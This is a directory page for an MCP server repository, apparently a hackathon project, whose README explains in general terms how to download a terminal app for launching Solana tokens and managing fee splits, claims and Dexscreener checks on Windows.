Newcontext-mode—Save 98% of your AI coding agent's context windowLearn more
MCP Directory
ServersClientsBlog

context-mode

Save 98% of your AI coding agent's context window. Works with Claude Code, Cursor, Copilot, Codex, and more.

Try context-mode
MCP Directory

Model Context Protocol Directory

MKSF LTD
Suite 8805 5 Brayford Square
London, E1 0SG

MCP Directory

  • About
  • Blog
  • Documentation
  • Contact

Menu

  • Servers
  • Clients

© 2026 model-context-protocol.com

The Model Context Protocol (MCP) is an open standard for AI model communication.
Powered by Mert KoseogluSoftware Forge
  1. Home
  2. Servers
  3. Bags-SDK-hackathon

Bags-SDK-hackathon

GitHub

Launch coins from your terminal with Bags SDK MCP server for agent auth, fee splits, claims, Dexscreener, and scout mode

0
1

🪙 Bags-SDK-hackathon - Launch Tokens in Three Steps

Download

🧭 What this is

Bags-SDK-hackathon is a terminal app that helps you launch a coin in three steps. It is built for people who want a simple flow and do not want to manage each part by hand.

It includes tools for:

  • token setup
  • fee splits
  • claims
  • Dexscreener checks
  • agent auth
  • Solana actions
  • MCP tool access

If you want to try it on Windows, use the link above to visit the GitHub page and download or clone the project files.

💾 Download and install on Windows

Use this link to visit the page and download or set up the app:

Visit the GitHub download page

Steps

  1. Open the link above in your browser.
  2. On the GitHub page, look for the green Code button.
  3. Click Code, then choose Download ZIP.
  4. Save the file to your computer.
  5. Right-click the ZIP file and choose Extract All.
  6. Open the extracted folder.
  7. Look for a file named README.md and follow the setup steps listed there.
  8. If the project includes a ready-to-run Windows file, double-click it to start the app.

🖥️ What you need

This app works best on a Windows computer with:

  • Windows 10 or Windows 11
  • A stable internet connection
  • At least 4 GB of memory
  • A few hundred MB of free disk space
  • A terminal app such as Command Prompt or PowerShell

For best results, use the latest version of Windows and keep your system updated.

⚙️ Before you start

You may need:

  • a GitHub account to access the files
  • a Solana wallet or wallet file for token actions
  • basic access keys for agent auth
  • a browser for checking token pages and Dexscreener data

Keep your wallet and private keys private. Only use files and keys you trust.

🚀 Quick start

Follow these steps in order:

  1. Download the project from GitHub.
  2. Extract the files.
  3. Open PowerShell in the project folder.
  4. Run the setup command listed in the project files.
  5. Start the app from the terminal.
  6. Follow the on-screen prompts to launch your coin.

The app is built around a three-step flow, so you should see a simple path through the launch process.

🧰 How the app works

The app guides you through a launch flow with tools that help with each part of the process.

Main tasks

  • create or prepare a token
  • set fee splits
  • manage claim actions
  • check token data on Dexscreener
  • connect agent auth
  • use MCP tools from the terminal
  • hand off actions to your AI helper

What “43 MCP tools” means

The app includes many small tools that handle specific tasks. You do not need to learn each one at first. In most cases, the app asks short questions and then uses the right tool for the job.

🪄 Three-step flow

The app is built to keep the launch process simple.

Step 1: Prepare

Set up the token details, wallet access, and launch settings.

Step 2: Launch

Run the launch action from the terminal and confirm the prompts.

Step 3: Review

Check fee splits, claims, and market data after the launch.

This flow helps keep the process clear for users who do not want to manage each part on their own.

🔐 Agent auth

Agent auth helps the app know that the right user is in control. If you use an AI helper or connected tools, auth keeps the session tied to your setup.

Common uses include:

  • approving actions
  • linking tools
  • keeping launch steps in order
  • reducing manual input

📊 Dexscreener support

The app can check token data with Dexscreener. This helps you view:

  • price movement
  • trading activity
  • market visibility
  • token pair data

You can use this data to see how your token looks after launch.

💸 Fee splits and claims

The app supports fee splits so you can route parts of the fee to the right places. It also supports claim actions, which can help with token-related claims in your launch flow.

You can use these features to:

  • set where fees go
  • split shares between wallets
  • confirm claim steps
  • keep your launch setup organized

🧪 Example use case

Here is a simple way a user might use the app:

  1. Open the project in Windows.
  2. Start the terminal app.
  3. Follow the setup prompts.
  4. Connect the wallet or auth step.
  5. Set the token name and launch details.
  6. Run the launch flow.
  7. Check the token on Dexscreener.

📁 Project topics

This repository covers:

  • agent tools
  • Bags.fm
  • hackathon work
  • Hermes
  • launch flows
  • MCP
  • Moltbook
  • OpenClaw
  • Solana
  • token setup
  • TypeScript

These topics point to a toolset built for launch automation and terminal-based control.

🛠️ If something does not work

If the app does not start, check these items:

  • the files are fully extracted
  • you opened the correct folder
  • your terminal is running in the project directory
  • your wallet or auth file is in the right place
  • your internet connection is active

If the app asks for setup values, enter them carefully and match the format shown on screen.

📌 Basic Windows tips

To open PowerShell in the project folder:

  1. Open the folder in File Explorer.
  2. Click the address bar.
  3. Type powershell.
  4. Press Enter.

To open Command Prompt:

  1. Press Win + R.
  2. Type cmd.
  3. Press Enter.

🔎 File names you may see

You may see files and folders such as:

  • README.md
  • package.json
  • src
  • dist
  • .env
  • node_modules

If the project uses a setup file, follow the steps in the README or on-screen prompts.

🧩 Common questions

Do I need to know code?

No. The app is designed to guide you through the steps in plain language.

Can I use it on Windows?

Yes. The setup steps above are written for Windows users.

Do I need a wallet?

Yes, if you want to use token launch features and Solana actions.

What if I only want to look around?

You can still open the project page and read the files before you run anything.

🧭 Where to start

Use the GitHub link at the top of this page, download the project, extract it on Windows, then open the folder and follow the setup steps in the terminal

Repository

AL
Alessqi

Alessqi/Bags-SDK-hackathon

Created

April 2, 2026

Updated

April 13, 2026

Language

TypeScript

Category

AI